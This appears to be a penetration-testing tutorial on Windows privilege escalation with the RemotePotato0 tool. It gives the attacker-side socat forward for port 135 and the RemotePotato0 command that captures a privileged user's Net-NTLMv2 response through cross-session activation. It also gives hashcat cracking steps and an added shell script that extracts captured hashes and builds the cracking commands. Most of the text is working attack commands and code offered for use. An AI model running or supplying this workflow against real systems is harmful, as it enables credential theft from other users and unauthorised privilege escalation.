
Windows PrivEsc with RemotePotato

On the local (attacker) machine, start a port forward from TCP/135 to the port on which RemotePotato0 will open its rogue OXID resolver (9999 below). The forward is needed because the target only resolves OXIDs against port 135, and it has to run as root because 135 is a privileged port.

sudo socat tcp-listen:135,fork,reuseaddr tcp:<remote-ip>:9999

On the target Windows machine, run RemotePotato0. The executable can be downloaded from https://github.com/antonioCoco/RemotePotato0. Another user, ideally a privileged one, must be logged on in the session passed with -s (session 1 below), because it is that user's NTLM authentication that gets triggered; list the logged-on sessions with query user (qwinsta) before picking the session id.

# -m: Module (2: Rpc capture server + potato trigger)
# -x: Rogue Oxid resolver IP (the attacker host running the socat forward)
# -p: Rogue Oxid resolver port (the port the socat forward points at)
# -s: Session id for the Cross Session Activation attack (the session of the user whose authentication is captured)
.\RemotePotato0.exe -m 2 -x <local-ip> -p 9999 -s 1

If the activation succeeds, RemotePotato0 prints the NTLMv2 response of the user logged on in the chosen session. This is a Net-NTLMv2 challenge/response, not the NT hash itself, so it cannot be used for pass-the-hash; crack it offline with hashcat -m 5600 to recover the user's password.
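The two steps above and the offline cracking they lead to, as an added attacker-side helper script. This is example code, not part of the original page or of the RemotePotato0 project; the function names, the TARGET_IP variable and the sample captured output are this example's own assumptions. It prints the socat forward for a given target, classifies captured lines by the standard hashcat NetNTLMv2 (mode 5600) and NetNTLMv1 (mode 5500) field layouts so that the wrong cracking mode is not used, and pulls the crackable lines out of saved tool output.

```shell
#!/bin/sh
# Attacker-side helpers for the RemotePotato0 workflow on this page.
# Added example, not code from the page or from the RemotePotato0 project:
# the function and variable names below are this example's own.
set -eu

# Step 1 of the page: print the socat forward that exposes TCP/135 locally and
# relays it to the rogue OXID resolver RemotePotato0 opens on the target
# (its -p port, 9999 by default). The victim only resolves OXIDs against
# port 135, so the redirect is what makes the rogue resolver reachable.
socat_forward_cmd() {
    target_ip="$1"
    rogue_port="${2:-9999}"
    printf 'sudo socat tcp-listen:135,fork,reuseaddr tcp:%s:%s\n' "$target_ip" "$rogue_port"
}

# Classify one captured hash line by its field layout and print the matching
# hashcat mode, so the right mode is used when cracking offline:
#   5600  NetNTLMv2: user::DOMAIN:challenge(16 hex):NTProofStr(32 hex):blob(hex)
#   5500  NetNTLMv1: user::DOMAIN:LMresp(48 hex):NTresp(48 hex):challenge(16 hex)
# Prints nothing and returns 1 for anything else (log chatter, truncated lines).
ntlm_hash_mode() {
    if printf '%s\n' "$1" | grep -Eq '^[^[:space:]:]+::[^:]*:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+$'; then
        echo 5600
    elif printf '%s\n' "$1" | grep -Eq '^[^[:space:]:]+::[^:]*:[0-9a-fA-F]{48}:[0-9a-fA-F]{48}:[0-9a-fA-F]{16}$'; then
        echo 5500
    else
        return 1
    fi
}

# Read saved tool output on stdin and print only well-formed NetNTLM lines,
# one per line, ready to be written to a hashcat input file. The hash is taken
# as the last whitespace-separated token of each line, so both a
# "[+] ... : <hash>" style log line and a bare hash line are handled.
extract_ntlm_hashes() {
    while IFS= read -r line; do
        token="${line##* }"
        if ntlm_hash_mode "$token" >/dev/null 2>&1; then
            printf '%s\n' "$token"
        fi
    done
}

# Constructed sample output (not a real RemotePotato0 capture; the tool's log
# lines may look different, only the hash format itself is the standard one).
SAMPLE_OUTPUT='[*] Spawning COM object in the session: 1
[+] Got NTLM type 3 AUTH message from LAB\alice with hostname WS01
[+] NTLMv2 hash: alice::LAB:1122334455667788:aabbccddeeff00112233445566778899:0101000000000000a0b1c2d3e4f5061700112233445566778899aabbccddeeff
[*] Done'

# Demo run: show the forward to start first, then the cracking command for
# every hash found in the sample output. TARGET_IP is assumed, set it in the
# environment; the placeholder matches the page's command when it is unset.
socat_forward_cmd "${TARGET_IP:-<remote-ip>}"
printf '%s\n' "$SAMPLE_OUTPUT" | extract_ntlm_hashes | while IFS= read -r h; do
    printf 'hashcat -m %s hashes.txt wordlist.txt   # for user %s\n' "$(ntlm_hash_mode "$h")" "${h%%::*}"
done
```

Save the real RemotePotato0 output to a file and feed it through extract_ntlm_hashes to get a clean hashcat input; a line that is rejected usually means it was truncated when copied from the console.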
